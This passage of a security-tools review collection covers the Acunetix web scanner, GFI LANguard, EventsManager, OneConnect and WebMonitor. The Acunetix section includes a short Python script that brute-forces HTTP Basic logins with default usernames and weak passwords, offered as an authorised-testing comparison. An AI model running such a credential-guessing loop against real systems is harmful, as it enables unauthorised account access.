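    # A 200 (or redirect target) that matches the custom error page is not a real hit.
    if custom_not_found is not None and response.text == custom_not_found:
        return False
    return True

print(page_exists("/admin/"))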

I had updated the tool before scanning, and saw the threat database being updated with some recent threats. I don’t know the threat update frequency, but the process was straightforward and, unlike many tools, didn’t require me to restart the tool with the new DB.

reviews-acunetix-4

Since I was more interested in the ‘how can I help myself’ as opposed to ‘how can you help me’ approach to scanning, I fiddled with the fuzzer, request generator and authentication tester. These are very robust implementations; there are fully fledged tools dedicated to just this functionality, and you should not be surprised to see more people discarding other tools and using Acunetix as a one-stop-shop toolbox.

One note though: the usernames dictionary for the authentication tester is far too limited out of the box (3-4 usernames). The password list was reasonably large, but the tool should include a proper default username list (where are things like ‘tomcat’, ‘frontpage’ etc?) so as not to give people a false sense of security. Given that weak password authentication is still one of the top reasons for a security breach, this module could use a reworking. I would like to see something more tweakable, along the lines of Brutus or Hydra's HTTP authentication capabilities. Perhaps the ability to plug in a third party bruteforce tool would be nice.
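
For comparison, a Hydra-style HTTP Basic authentication check boils down to little more than the loop below (plain Python with requests; the target URL and word lists are hypothetical, and this is only something to run against systems you are authorised to test). The point is that the loop is only ever as good as the dictionaries you feed it:

import requests

# Hypothetical protected URL - only ever test systems you are authorised to test.
TARGET = "http://10.0.0.5/protected/"
USERNAMES = ["admin", "administrator", "tomcat", "frontpage", "root"]
PASSWORDS = ["password", "admin", "changeme", "letmein"]

for username in USERNAMES:
    for password in PASSWORDS:
        response = requests.get(TARGET, auth=(username, password), timeout=10)
        if response.status_code != 401:
            print(f"Possible valid credentials: {username}:{password}")
            break  # move on to the next username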

Here I am playing with the HTTP editor:

reviews-acunetix-5

Here’s the neat little encoder utility that I was talking about earlier. You will not miss this one in the middle of a detailed test:

reviews-acunetix-6

After being satisfied that this product could get me through the manual phase of my audits, I fell back on my tester’s laziness and hit the scan button while sipping a Red Bull.

The results arrive in real time and are browseable, which is far better than seeing a progress bar creep forward arbitrarily. While this may seem cosmetic, when you’re being pushed to deliver a report, you want to be able to keep testing manually in parallel. I was watching the results come in and using the HTTP editor to replicate the responses and judge what required my manual intervention.

Essentially, Acunetix chews through the application looking for potential flaws and lets you take over to verify them in parallel. This is absolutely the right approach, and far more expensive tools that I've used do not realise this. Nobody with half smarts will rely purely on the output of a tool; a thorough audit will have the tester investigating areas of concern on his own. If I have to wait for your tool to finish everything it does before I can even see those half-results, you've wasted my time.

Here’s how the scanning window looked:

reviews-acunetix-7

Now bear in mind that I was running this test over a 256kbps link on the Internet, so I was expecting it to take time, especially given that Firewall.cx has an extremely large set of pages. Halfway through, I had to stop the test as it was bravely taking on the task of analyzing every single page in our forums. However, there was constant feedback through the activity window and my network interface, so you don't end up wondering whether the product has hung, as is the case with many other products I've used.

The reporting features are pretty granular, allowing you to select the usual executive summary and detailed report options. Frankly, I like the way the results are presented and in the course of my audits never needed to generate a report from the tool itself. I’m certain that the features of the reporting module will more than suffice. The descriptions of the vulnerabilities are well written, the solutions are accurate and the links to more information come from authoritative sources. If you come back to what I said in the opening stages of this review, this is the most important information that a tool should look to provide. Nothing is more terrible than ambiguous results, and that is a problem you will not have with this product.

One drawback found with the product was the lack of a more complete scripting interface. Many testers would like the ability to add their own code to the scanning setup. I did check out the vulnerability editor feature, but would prefer something that gave me more flexibility. Another was the lack of a version for Linux / UNIX-like systems. The majority of security testers operate from these platforms and it would be nice not to have to switch to a virtual machine or deal with a dual-boot configuration to be able to harness the power of this tool. Neither of these drawbacks is a deal killer, and they should be treated more as feature requests.

Other than that, I truly enjoyed using this product. Web application auditing can be a tedious and time consuming nightmare, and the best praise I can give Acunetix is that they’ve made a product that makes me feel a part of the test. The interactivity and levels of detail available to you give you the ability to be laid back or tinker with everything you want, while the test is still going on. With its features and reasonable pricing for a consultant’s license, this product is unmatched and will quickly become one of the premier tools in your arsenal.


GFI LANguard Network Security Scanner Version 5.0 Review

In the light of all the recent attacks that tend to focus on the vulnerabilities of Windows platforms, we were increasingly dissatisfied with the common vulnerability scanners that we usually employ. We wanted a tool that didn't just help find holes, but would help administer the systems, deploy patches, view account / password policies etc. In short, we were looking for a Windows specialist tool.

Sure, there are a number of very popular (and very expensive) commercial scanners out there. However, most of them are prohibitively priced for the networks we administer and all of them fell short on the administrative front. We tested a previous version of LANguard and our initial impressions were good. Thus we decided to give their latest offering a spin.

Getting Started

Getting the tool was easy enough, a quick visit to GFI's intuitively laid out site, and a 10MB download later, we were set to go. We must mention that we're partial to tools that aren't too heavy on the disk-space. Sahir has started carrying around a toolkit on his cell-phone USB drive, where space is at a premium. 10MB is a reasonable size for a program with all the features of this one.

Installation was the usual Windows deal (click <next> and see how quickly you can reach <finish>). We fired up the tool and were greeted with a splash screen that checked for a newer version and downloaded new patch detection files, dictionaries, etc.

reviews-gfi-languard-1

We'd prefer to have the option of updating rather than having it happen every time at startup, but we couldn't find a way to change this behaviour; adding one is a minor point GFI should address.

Interface

Once the program is fully updated, you're greeted with a slick interface that looks like it's been built in .NET. No low-colour icons or cluttered toolbars here. While some may consider this inconsequential, it's a pleasure to work on software that looks good. It gives it that final bit of polish that's needed for a professional package. You can see the main screen below.

reviews-gfi-languard-2

The left panel shows all the tools available and is like an ‘actions' pane. From here you can select the security scanner, filter your scan results in a variety of ways, access the tools (such as patch deployment, DNS lookup, traceroute, SNMP audit, SQL server audit etc) and the program configuration as well. In fact if you look under the menus at the top, you'll find very few options as just about everything can be controlled or modified from the left panel.

The right panel obviously shows you the results of the scan, or the tool / configuration section you have selected. In this case it's on the Security Scanner mode where we can quickly setup a target and scan it with a profile. A profile is a description of what you want to scan for, the built in profiles include:

  • Missing patches
  • CGI scanning
  • Only Web / Only SNMP
  • Ping them all
  • Share Finder
  • Trojan Ports
  • Full TCP & UDP port scan

In the Darkness, Scan ‘em...

We set up the default scanning profile and scanned our localhost (a mercilessly locked-down XP box that resists spirited break-ins from our practice penetration tests). We scanned as the ‘currently logged on user’ (an administrator account), which makes a difference, since you see a lot more when scanning with privileges than without. As we had expected, this box was fairly well locked down. Here is the view just after the scan finished:

reviews-gfi-languard-3

Clicking one of the filters in the left pane brings up a very nicely formatted report, showing you the information you requested (high vulnerabilities, low vulnerabilities, missing patches etc). Here is the full report:

reviews-gfi-languard-4

As you can see, it identified three open ports (no filtering was in place on the loopback interface) as well as MAC address, TTL, operating system etc.

We were not expecting much to show up on this highly-secured system, so we decided to wander further.

The Stakes Get Higher...

Target 2 is the ‘nightmare machine’. It is a box so insecure that it can only be run under VMware with no connection to the Internet. What better place to set LANguard free than on a Windows XP box, completely unpatched, completely open? If it were set up on the ‘net it would go down within a couple of minutes!

However, this was not good enough for our rigorous requirements, so we infected the box with a healthy dose of Sasser. Hopefully we would be able to finish the scan before LSASS.exe crashed, taking the system down with it. To make life even more difficult, we didn't give LANguard the right credentials like we had before. In essence, this was a 'no privilege' scan.

reviews-gfi-languard-5

LANguard detected the passwordless Administrator account, the Sasser backdoor, the default shares and the active Terminal Services (we enabled it for the scenario). In short, it picked up on everything.

We purposely didn't give it any credentials as we wanted to test its patch deployment features last, since this was what we were really interested in. This was very impressive as more expensive scanners (notably Retina) missed out on a lot of things when given no credentials.

To further extend our scans, we thought it would be a good idea to scan our VLAN network containing over 250 Cisco IP Phones and two Cisco Call Managers. LANguard was able to scan all the IP Phones without a problem and also gave us some interesting findings, as shown in this screenshot:

reviews-gfi-languard-6

LANguard easily detected the open HTTP port (80) and even included a sample of the actual page a client would download when connecting to the target host!

It is quite important to note at this point that the scan shown above was performed without any disruption to our Cisco VoIP network. Even though no vulnerabilities were detected – something we expected – we were pleased to see LANguard capable of working in our Cisco VoIP network without problems.

If you can't join them… Patch them!

Perhaps one of the neatest features of GFI's LANguard is the patch management system, designed to automatically patch the systems you have previously scanned. The automatic patching system works quite well, but you should download the online PDF file that contains instructions on how to proceed should you decide to use this feature.

The automatic patching requires the host to be previously scanned in order to find all missing patches, service packs and other vulnerabilities. Once this phase is complete, you're ready to select the workstation(s) you would like to patch!

As expected, you need the appropriate credentials in order to successfully apply all selected patches, and for this reason there is a small field in which you can enter your credentials for the remote machine.

We started by selectively scanning two hosts so that we could then patch one of them. The target host was 10.0.0.54, a Windows 2000 workstation that was missing a few patches:

reviews-gfi-languard-7

LANguard successfully detected the missing patches on the system as shown on the screenshot above, and we then proceeded to patch the system. A very useful feature is the ability to select the patch(es) you wish to install on the target machine.

reviews-gfi-languard-8

As suggested by LANguard, we downloaded the selected patch and pointed our program to install it on the remote machine. The screen shot above shows the patch we wanted to install, followed by the machine on which we selected to install it. At the top of the screen we needed to supply the appropriate credentials to allow LANguard to do its job, that is, a username of 'Administrator' and a password of ..... sorry - can't tell :)

Because most patches require a system reboot, LANguard includes such options, ensuring that no input at all is required on the other side for the patching to complete. Advanced options such as ‘Warn user before deployment' and ‘Delete copied files from remote computer after deployment', are there to help cover all your needs:

reviews-gfi-languard-9

The deployment status tab is another smart feature; it allows the administrator to view the patching in progress. It clearly shows all steps taken to deploy the patch and will report any errors encountered.

It is also worth noting that we tried making life more difficult by running the patch management system from our laptop, which was connected to the remote network via the Internet and secured using a Cisco VPN tunnel with IPSec as the encryption protocol. Our expectation was that GFI's LANguard would fail terribly, giving us the green light to note a weak point of the program.

To our surprise, it seems GFI's developers had already foreseen such situations and the results were simply amazing, allowing us to successfully scan and patch a Windows 2000 workstation located at the far end of the VPN tunnel!

Summary

GFI without doubt has created a product that most administrators and network engineers would swear by. It's efficient, fast and very stable, able to perform its job whether you're working on the local or remote LAN.

Its features are very helpful: you won't find many network scanners pointing you to web pages where you can find out all the information on discovered vulnerabilities, download the appropriate patches and apply them with a few simple clicks of a mouse!

We've tried LANguard on everything from small networks with 5 to 10 hosts up to large corporate networks with more than 380 hosts, over WAN links and Cisco VPN tunnels, and it worked like a charm without creating problems such as network congestion. We are confident that you'll love this product's features and that it will quickly become one of your most necessary programs.


GFI EventsManager 7 Review

Imagine having to trawl dutifully through the event logs of twenty or thirty servers every morning, trying to spot those few significant events that could mean real trouble among that avalanche of operational trivia. Now imagine being able to call up all those events from all your servers in a single browser window and, with one click, open an event category to display just those events you are interested in…

Sounds good? Install this product, and you’ve got it.

A product of the well-known GFI stables, EventsManager 7 replaces their earlier LANguard Security Event Log Monitor (S.E.L.M.) which is no longer available. There’s also a Reporting Suite to go with it; but we haven’t reviewed that here.

In a nutshell the product enables you to collect and archive event logs across your organisation, but there’s so much more to it than that. It’s hard to condense the possibilities into a review of this size, but what you actually get is:

  • Automatic, scheduled collection of event logs across the network; not only from Windows machines but from Linux/Unix servers too, and even from any network kit that can generate syslog output;
  • The ability to group your monitored machines into categories and to apply different logging criteria to each group;
  • One tool for looking at event logs everywhere. No more switching the event log viewer between servers and messing around with custom MMCs;
  • The ability to display events by category or interest type regardless of where they occurred (for example just the Active Directory replication events, just the system health events, just the successful log-on events outside normal working hours);
  • Automated response actions for particular events or types of events including alerting staff by email or pager or running an external script to deal with the problem;
  • A back-end database into which you can archive raw or filtered events and which you can search or analyse against – great for legal compliance and for forensic investigation.

You can download the software from GFI’s website and, in exchange for your details, they’ll give you a thirty-day evaluation key that unlocks all the features; plenty of time to decide if it’s right for you. This is useful, because you do need to think about the deployment.

One key issue is the use of SQL-Server as the database back-end. If you have an existing installation you can use that if capacity permits, or you could download SQL Server Express from Microsoft. GFI do tell you about this but it’s hidden away in Appendix 3 of the manual, and an early section giving deployment examples might have been useful.

That said, once the installation completes a handy wizard pops up to lead you through the key things you need to set up:

reviews-eventsmanager-1

Here again are things you’ll need to think about – such as who will get alerted, how, when and for what, and what actions need to be taken.

You’ll also need to give EventsManager a user that has administrative access to the machines you want to monitor and perhaps the safest way to do this is to set up a new user dedicated to that purpose.

Once you’ve worked through the wizard you can add your monitored machines under the various categories previously mentioned. Ready-made categories allow you to monitor according to the type, function or importance of the target machine and if you don’t like those you can edit them or create your own.

reviews-eventsmanager-2

The categories are more than just cosmetic; each one can be set up to define how aggressively EventsManager monitors the machines, their ‘working week’ (useful for catching unauthorised out-of-hours activity) and the types of events you're interested in (you might not want Security logs from your workstations, for example). Encouragingly though, the defaults provided are completely sensible and can be used without worry.

reviews-eventsmanager-3

Once your targets are defined you’ll begin seeing logs in the Events Browser, and this is where the product really scores. To the left of the browser is a wealth of well-thought-out categories and types; click on one of these and you’ll see those events from across your enterprise. It’s as simple, and as wonderful as that.

reviews-eventsmanager-4

You can click on the higher-level categories to view, for example, all the SQL Server events, or you can expand that out and view the events by subcategory (just the Failed SQL Server Logons for example).

Again, if there are events of particular significance in your environment you can edit the categories to include them, or even create your own right down to the specifics of the event IDs and event types they collect. A particularly nice category is ‘Noise’, which you can use to collect all that day-to-day operational verbiage and keep it out of the way.

For maximum benefit you’ll also want to assign actions to key categories or events. These can be real-time alerts, emails, corrective action scripts and log archiving. And again, you guessed it, this is fully customisable. The ability to run external scripts is particularly nice as with a bit of tweaking you can make the product do anything you like.

reviews-eventsmanager-5
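
As a feel for what "anything you like" can mean, an external action script can be as mundane or as clever as you need. The sketch below is plain Python rather than anything GFI ships – the service name and log path are made up – and shows the sort of corrective action you might hang off a "service stopped unexpectedly" event:

import datetime
import subprocess
import sys

SERVICE_NAME = "Spooler"                    # hypothetical service to bounce
LOG_FILE = r"C:\EventActions\restarts.log"  # hypothetical log location

def main():
    # 'net stop' / 'net start' are present on any Windows box, so no extra tooling is needed.
    subprocess.run(["net", "stop", SERVICE_NAME], check=False)
    result = subprocess.run(["net", "start", SERVICE_NAME], check=False)

    status = "restarted" if result.returncode == 0 else "FAILED to restart"
    with open(LOG_FILE, "a") as log:
        log.write(f"{datetime.datetime.now().isoformat()} {SERVICE_NAME} {status}\n")

    sys.exit(result.returncode)

if __name__ == "__main__":
    main()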

Customisation is one of the real keys to this product. Install it out of the box, just as it comes, and you’ll find it useful. But invest some time in tailoring it to suit your organisation and you’ll increase its value so much you’ll wonder how you ever managed without it.

In operation the product proved stable though perhaps a little on the slow side when switching between screens and particularly when starting up. This is a testimony to the fact that the product is doing a lot of work on your behalf and, to get the best from it, you really should give it a decent system to run on. The benefits you’ll gain will more than make up for the investment.


GFI OneConnect – Stop Ransomware, Malware, Viruses, and Email hacks Before They Reach Your Exchange Server

gfi-oneconnect-ransomware-malware-virus-datacenter-protection-1a

GFI Software has just revealed GFI OneConnect Beta – its latest Advanced Email Security Protection product. GFI OneConnect is a comprehensive solution that targets the safe and continuous delivery of business email to organizations around the world.

GFI has leveraged its years of experience with its millions of business users around the globe to create a unique hybrid solution, consisting of an on-premises server and a cloud-based service, that helps IT admins and organizations protect their infrastructure from spam, malware threats, ransomware, viruses and email service outages.

GFI OneConnect not only takes care of filtering all incoming email for your Exchange server but it also works as a backup service in case your Exchange server or cluster is offline.

The solution consists of the GFI OneConnect Server that is installed on the customer’s premises. The OneConnect server connects to the local Exchange server on one side, and the GFI OneConnect Data Center on the other side as shown in the diagram below:

Deployment model of GFI OneConnect (Server & Data Center)

Figure 1. Deployment model of GFI OneConnect (Server & Data Center)

Email sent to the organization's domain is initially routed through GFI OneConnect. During this phase email is scanned by the two antivirus engines (ClamAV & Kaspersky) for viruses, ransomware, malware, etc. before being forwarded to the Exchange server.

If the Exchange server goes offline, GFI OneConnect's Continuity mode will send and receive all email until the Exchange server is back online, after which all emails are automatically synchronised. Emails received while your email server was down remain available to users at all times, thanks to the connection to the cloud-based GFI OneConnect Data Center.


Figure 2. GFI OneConnect Admin Dashboard (click to enlarge)

While the product is currently in beta, our first impressions show that this is an extremely promising solution that has been carefully designed with the customer and IT staff in mind. According to GFI the best is yet to come – and we know that GFI always stands by its promises – so we are really looking forward to seeing the final version of this product in early 2017.

If you've been experiencing issues with your Exchange server continuity or have problems dealing with massive amounts of spam email, ransomware and other security threats, give the GFI OneConnect Beta a test run and discover how it can help offload all these problems permanently, leaving you time for other more important tasks.


Enforcing ICT Policies - How to Block Illegal & Unwanted Websites from your Users and Guests

Ensuring users follow company policies when accessing the internet has become a real challenge for businesses and IT staff. The legal implications for businesses not taking measures to enforce acceptable use policies (where possible) can become very complicated and businesses can, in fact, be held liable for damages caused by their users or guests.

A good example, found in almost every business around the world, is the offering of guest internet access to visitors. While they are usually unaware of the company’s ICT policies (nor do they really care about them) they are provided with free unrestricted access to the internet.

Sure, the firewall will only allow DNS, HTTP and HTTPS traffic in an attempt to limit internet access and its abuse but who’s ensuring they are not accessing illegal sites/content such as pornography, gambling, etc., which are in direct violation of the ICT policy?

This is where solutions like GFI WebMonitor help businesses cover this sensitive area by quickly filtering website categories in a very simple and effective way that makes it easy for anyone to add or remove specific website categories or URLs.

How To Block Legal Liability Sites

Enforcing your ICT Internet Usage Policy via WebMonitor is a very simple and fast process. From the WebMonitor web-based dashboard, click on Manage and select Policies:

Note: Click on any image to enlarge it and view it in high-resolution

Figure 1. Adding a new Policy in GFI WebMonitor

At the next screen, click on Add Policy:

Figure 2. Click on the GFI WebMonitor Add Policy button

At the next screen add the desired Policy Name and brief description below:

Figure 3. Creating the Web Policy in GFI WebMonitor using the WEBSITE element

Now click and drag the WEBSITES element (on the left) into the center of the screen as shown above.

Next, configure the policy to Block traffic matching the filters we are about to create and optionally enable temporary access from users if you wish:

Figure 4. Selecting Website Categories to be blocked and actions to be taken

Under the Categories section click inside the Insert a Site Category field to reveal a drop-down list of the different categories. Select a category by clicking on it and then click on the ‘+’ symbol to add the category to this policy. Optionally you can click on the small square icon next to the ‘+’ symbol to get a pop-up window with all the categories.

Optionally select to enable full URL logging and then click on the Save button at the top right corner to save and enable the policy.

The new policy will now appear on the Policies dashboard:

enforce-ict-policies-block-illegal-and-unwanted-websites-5

Figure 5. Our new WebMonitor policy is now active

If for any reason you need to disable the policy, all you need to do is click on the green power button on the left and the policy is disabled immediately – a very handy feature that allows administrators to take immediate action when they notice unwanted effects from a new policy.

After the policy was enabled we tried accessing a gambling website from one of our workstations and received the following message on our web browser:

Our new policy blocks users from accessing gambling sites

Figure 6. Our new policy blocks users from accessing gambling sites

The GFI WebMonitor Dashboard reporting Blocking/Warning hits on the company’s policies:

GFI WebMonitor reports our Internet usage ICT Policy is being hit

Figure 7. GFI WebMonitor reports our Internet usage ICT Policy is being hit (click for full dashboard image)

Summary

The importance of properly enforcing an ICT Internet Usage Policy cannot be overstated. It can save not only the company from legal implications but also its users and guests from their very own actions. Solutions such as GFI WebMonitor are designed to help businesses effectively apply ICT Policies and control usage of high-risk resources such as the internet.


Minimise Internet Security Threats, Scan & Block Malicious Content, Application Visibility and Internet Usage Reporting for Businesses

gfi-webmonitor-internet-usage-reporting-block-malicious-content-1a

For every business, established or emerging, the Internet is an essential tool which has proved to be indispensable. The usefulness of the internet can, however, be counteracted by abuse of it by a business's employees or guests. Activities such as downloading or sharing illegal content, visiting high-risk websites and accessing malicious content are serious security risks for any business.

There is a very easy way of monitoring, managing and implementing effective Internet usage. GFI WebMonitor can not only provide the aforementioned, but also real-time web usage data, which allows for tracking bandwidth utilisation and traffic patterns. All this information can then be presented on an interactive dashboard. It is also an effective management tool, providing a business with the internet usage records of its employees.

Such reports can be highly customised to provide usage information based on the following criteria/categories:

  • Most visited sites
  • Most commonly searched phrases
  • Where most bandwidth is being consumed
  • Web application visibility

Some of the sources for web abuse that can be a time sink for employees are social media and instant messaging (unless the business operates at a level where these things are deemed necessary). Such web sites can be blocked.

GFI WebMonitor can also achieve other protective layers for the business by providing the ability to scan and block malicious content. WebMonitor helps the business keep a close eye on its employees’ internet usage and browsing habits, and provides an additional layer of security.

On its main dashboard, as shown below, the different elements help in managing usage and traffic source and targets:

WebMonitor’s Dashboard provides in-depth internet usage and reporting

Figure 1. WebMonitor’s Dashboard provides in-depth internet usage and reporting

WebMonitor’s main dashboard contains a healthy amount of information allowing administrators and IT managers to obtain important information such as:

  • See how many Malicious Sites were blocked and how many infected files detected.
  • View the Top 5 Users by bandwidth
  • Obtain Bandwidth Trends such as Download/Upload, Throughput and Latency
  • Number of currently active web sessions.
  • Top 5 internet categories of sites visited by the users
  • Top 5 Web Applications used to access the internet

Knowing which applications are used to access the internet is very important to any business. Web applications like YouTube, Bittorrent, etc. can be clearly identified and blocked, providing IT managers and administrators a ringside view of web utilisation.

On the flip side, if a certain application or website is blocked and a user tries to access it, he/she will encounter an Access Denied page rendered by GFI WebMonitor. This notification should be enough for the user to be deterred from trying it again:

WebMonitor effectively blocks malicious websites while notifying users trying to access it

Figure 2. WebMonitor effectively blocks malicious websites while notifying users trying to access it

For the purpose of this article, a deliberate attempt was made to download an ISO file using BitTorrent. The download page fell under the block policy, so GFI WebMonitor not only blocked the user from accessing the file, it also displayed the violation, stating the user's machine IP address and the policy that was violated. This is a clear demonstration of how effective the management of web applications can be.

Some of the other great dashboards include bandwidth insight. The following image shows the total download and upload for a specific period. The projected values and peaks can be easily traced as well.

Figure 3. WebMonitor’s Bandwidth graphs help monitor the organisation’s upload/download traffic (click to enlarge)

Another useful dashboard is that of activity. This provides information about total users, their web request, and a projection of the next 30 days, as shown in the following image:

Figure 4. WebMonitor allows detailed tracking of current and projected user web requests with very high accuracy (click to enlarge)

The Security dashboard is perhaps one of the most important. This shows all the breaches based on category, type and top blocked web based applications that featured within certain policy violations.

Figure 5. The Security dashboard allows tracking of web security incidents and security policy violations (click to enlarge)

Running Web Reports

The easiest way to manage and produce the information gathered is to run reports. The various categories provided allow the user to run and view information of Internet usage depending on management requirements. The following image shows the different options available on the left panel:

Figure 6. WebMonitor internet web usage reports are highly customisable and provide detailed information (click to enlarge)

But often management would rather take a pulse of the current situation. GFI WebMonitor caters to that requirement very well. The best place to look for instant information regarding certain key aspects of resource usage is the Web Insights section.

If management wanted to review the bandwidth information, the following dashboard would give that information readily:

Figure 7. The Web Insight section keeps an overall track of internet usage (click to enlarge)

This provides a percentage view of how much data contributes to download or upload.

Security Insights shows all current activities and concerns that need attention:

Figure 8. WebMonitor Security Insights dashboard displaying important web security reports (click to enlarge)

Conclusion

There is no doubt GFI WebMonitor is a very effective tool that allows businesses to monitor and control internet access for employees, guests and other internet users. Its intuitive interface allows administrators and IT Managers to quickly obtain the information they require, but also to put the necessary security policies in place to minimise security threats and internet resource abuse.


Increase your Enterprise or SMB Organization Security via Internet Application & User Control. Limit Threats and Internet Abuse at the Workplace

gfi-webmonitor-internet-application-user-control-1a

In this era of constantly pushing for more productivity and greater efficiency, it is essential that every resource devoted to web access within a business is utilised for business benefit. Unless the company concerned is in the business of gaming or social media, etc., it is unwise to use resources like internet/web access, and the infrastructure supporting it, for a purpose other than business. Like they say, “Nothing personal, just business”.

With this in mind, IT administrators have their hands full ensuring management of web applications and their communication with the Internet. The cost of not ensuring this is loss of productivity, misuse of bandwidth and potential security breaches. As a business it is prudent to block any unproductive web application e.g. gaming, social media etc. and restrict or strictly monitor file sharing to mitigate information leakages.

It is widely accepted that in this area firewalls are of little use. Port blocking is not the preferred solution as it has a similar effect to a sledge hammer. What is required is the fineness of a scalpel to parse out the business usage from the personal and manage those business requirements accordingly. To be able to manage web application at such a level, it is essential to be able to identify and associate the request with its respective web application. Anything in line with business applications goes through, the rest are blocked.

This is where WebMonitor excels in terms of delivering this level of precision and efficiency. It identifies access requests from supported applications using inspection technology and helps IT administrators to allow or block them. Hence, the administrators can allow certain applications for certain departments while blocking certain other applications as part of a blanket ban, thus enhancing the browsing experience of all users.

So, to achieve this, the process is to use the unified policy system of WebMonitor. The policies can be configured specifically for application control or, within the same policy, several application controls can be combined using other filtering technologies.

Let’s take a look at the policy panel of WebMonitor:

gfi-webmonitor-internet-application-user-control-1

Figure 1. WebMonitor Policy Panel interface. Add, delete, create internet access policies with ease (click to enlarge)

In order to discover the controls that are available against a certain application, the application needs to be dragged into the panel. For example, if we were to create a policy to block Google Drive we would be dragging that into the panel itself.

Once the related controls show up, we can select an application or application category the policy will apply to.

The rest of the configuration from this point will allow creating definitions for the following:

  • Filter options
  • Scope of the policy
  • Actions to be taken
  • Handling of exceptions
  • Managing notifications

All of the above are ready to be implemented in a drag-and-drop fashion. GFI WebMonitor will commence controlling the configured application's access to the Internet the moment the policy is saved.

So, going back to the example of creating the ‘block Google Drive’ policy, the steps are quite simple:

1. Click on ‘Add Policy’ as shown in the following image:

gfi-webmonitor-internet-application-user-control-2

Figure 2. Click on the “Add Policy” button to being creating a policy to block internet access

2. Enter a Name and description in the relevant fields:

gfi-webmonitor-internet-application-user-control-3

Figure 3. Adding policy name and description in WebMonitor to block an application network-wide (click to enlarge)

3. As this policy applies to ‘all’, at this moment there is no need to configure the scope. This can be done on a per user, group or IP address only basis.

4. Drag in the Application Block from the left panel (as shown in the following image) and select ‘Block’ in the ‘Allow, Block, Warn, Monitor’ section.

5. In the Application Category section, select ‘File Transfer’ as shown in the image below:

gfi-webmonitor-internet-application-user-control-4

Figure 4. WebMonitor: Blocking the File Transfer application category from the internet (click to enlarge)

6. Click on the ‘Applications’ tab and start typing ‘Google Drive’ in the field. The drop-down list will include Google Drive. Select it and press Enter; the application will be added. Now click on Save.

We need to keep in mind that the policy is operational the moment the Save button, located at the top right corner, is clicked.

Now, if any user tries to access the Google Drive web application, he/she will be presented with the ‘Block Page’ rendered by GFI WebMonitor. At the same time, any Google Drive thick client installed on the user's machine will not be able to connect to the Internet.

As mentioned earlier, and reiterated through the above steps, the process of creating and implementing a web access management policy in WebMonitor is quite simple. Given the length and breadth of configuration options within the applications and the scope, this proves to be a very powerful tool that will make the task of managing and ensuring proper usage of web access, simple and effective for IT Administrators in small and large enterprise networks.


GFI WebMonitor Installation: Gateway / Proxy Mode, Upgrades, Supported O/S & Architectures (32/64bit)

WebMonitor is an award-winning gateway monitoring and internet access control solution designed to help organizations deal with user internet traffic, monitor and control bandwidth consumption, protect computers from internet malware/viruses and other internet-based threats, plus much more. GFI WebMonitor supports two different installation modes: Gateway mode and Simple Proxy mode. We'll be looking into each mode to help administrators and engineers understand which is best, along with the prerequisites and caveats of each mode.

Proxy vs Gateway Mode

Proxy mode, also known as Simple Proxy mode, is the simplest way to install GFI WebMonitor. You can deploy this on any computer that has access to the internet. In Simple Proxy mode, all client web-browser traffic (HTTP/HTTPS) is directed through GFI WebMonitor. To enable this type of setup, you will need an internet-facing router that can forward traffic and block ports.

With GFI WebMonitor functioning in Simple Proxy mode, each client machine must also be configured to use the server as a web proxy for HTTP and HTTPS protocols. GFI WebMonitor comes with built-in Web Proxy Auto-Discovery (WPAD) server functionality that makes the process easy - simply enable automatic discovery of proxy server for each of your client machines and they should automatically find and use WebMonitor as a proxy. In case of a domain environment, it is best to regulate this setting using a Group Policy Object (GPO).
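
Before rolling the proxy setting out via WPAD or a GPO, it is worth confirming from a single client that requests actually flow through the WebMonitor host. A minimal sketch in Python using the requests library – the proxy host name and port below are assumptions for illustration and will differ in your deployment:

import requests

# Assumed WebMonitor host and proxy port - substitute your own values.
PROXY = "http://webmonitor.company.local:8080"
proxies = {"http": PROXY, "https": PROXY}

response = requests.get("http://www.example.com/", proxies=proxies, timeout=15)
print(response.status_code)   # 200 here means the request went out via the proxy
# Requests to a blocked category should instead come back with WebMonitor's block page.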

When WebMonitor is configured to function in Internet Gateway mode, all inbound and outbound client traffic will pass through GFI WebMonitor, irrespective of whether the traffic is HTTP or non-HTTP. With Internet Gateway mode, the client browser does not need to point to any specific proxy – all that’s required is to enable the Transparent Proxy function in GFI WebMonitor.

Supported OS & Architectures

Whether functioning as a gateway or a web proxy, GFI WebMonitor processes all web traffic. For smooth operation, that amounts to using a server capable of handling all the requests it will see every day. When the environment is small (10-20 nodes), for instance, a 2 GHz processor and 4 GB RAM minimum with a 32-bit Windows operating system architecture will suffice.

Larger environments will require the 64-bit architecture, running a Windows Server operating system with a minimum of 8 GB RAM and a multi-core CPU. GFI WebMonitor works with both 32-bit and 64-bit Windows operating system architectures starting from Windows 2003 and Windows Vista.

Installation & Upgrading

When installing for the first time, GFI WebMonitor starts by detecting its prerequisites. If the business is already using GFI WebMonitor, the process determines the prerequisites according to the older product instance. If the installation kit encounters an older instance, it imports the previous settings and redeploys them after completing the installation.

Whether installing for the first time or upgrading an older installation, the installation kit looks for any setup prerequisites necessary and installs them automatically. However, some prerequisites may require user interaction and these will come up as separate installation processes with their own user interfaces.

Installing GFI WebMonitor

As with all GFI products, installation is a very easy follow-the-bouncing-ball process. Once the download of GFI WebMonitor is complete, execute the installer using an account with administrative privileges.

If WebMonitor has been recently downloaded, you can safely skip the newer build check. When ready, click Next to proceed:

gfi-webmonitor-installation-setup-gateway-proxy-mode-1

Figure 1. Optional check for a new WebMonitor edition during installation

You will need to fill in the username and/or the IP address that will have administrative access to the web-interface of GFI WebMonitor, then click Next to select the folder to install GFI WebMonitor and finally start the installation process:

gfi-webmonitor-installation-setup-gateway-proxy-mode-2

Figure 2. Selecting Host and Username that are allowed to access the WebMonitor Administration interface.

Once the installation process is complete, click Finish to finalize the setup and leave the Open Management Console checked:

gfi-webmonitor-installation-setup-gateway-proxy-mode-3

Figure 3. Installation complete – Open Management Console

After this, the welcome screen of the GFI WebMonitor Configuration Wizard appears. This will allow you to configure the server to operate in Simple Proxy Mode or Gateway Mode. At this point, it is recommended you enable JavaScript in Internet Explorer or the web browser of your choice before proceeding further:

gfi-webmonitor-installation-setup-gateway-proxy-mode-4a

Figure 4. The welcome screen once WebMonitor installation has completed

After clicking on Get Started to proceed, we need to select which of the two modes GFI WebMonitor will be using. We selected Gateway mode to ensure we get the most out of the product as all internet traffic will flow through our server and provide us with greater granularity & control:

gfi-webmonitor-installation-setup-gateway-proxy-mode-5a

Figure 5. Selecting between Simple Proxy and Gateway mode

The Transparent Proxy can be enabled at this stage, allowing web browser clients to automatically configure themselves using the WPAD protocol. WebMonitor shows a simple network diagram to help understand how network traffic will flow to and from the internet:

gfi-webmonitor-installation-setup-gateway-proxy-mode-6a

